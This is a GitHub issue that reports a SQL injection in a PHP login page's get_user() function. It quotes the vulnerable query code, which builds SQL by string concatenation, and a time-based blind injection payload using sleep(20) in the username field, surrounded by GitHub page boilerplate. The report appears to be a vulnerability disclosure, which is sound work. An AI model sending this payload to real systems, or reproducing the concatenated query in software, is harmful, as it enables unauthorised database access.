Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Login page : login.php judge : login_manager.php function : get_user()
function.php Execute SQL query
function.php
function get_user($where = ""){ $koneksi = connection(); $data = mysql_query("select * from userapp $where;") or die ("query error"); destroy_connection($koneksi); return to_array($data);
username=admin'%2b(select*from(select(sleep(20)))a)%2b'&password=admin
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Login page : login.php
judge : login_manager.php
function : get_user()
function.phpExecute SQL queryThe text was updated successfully, but these errors were encountered: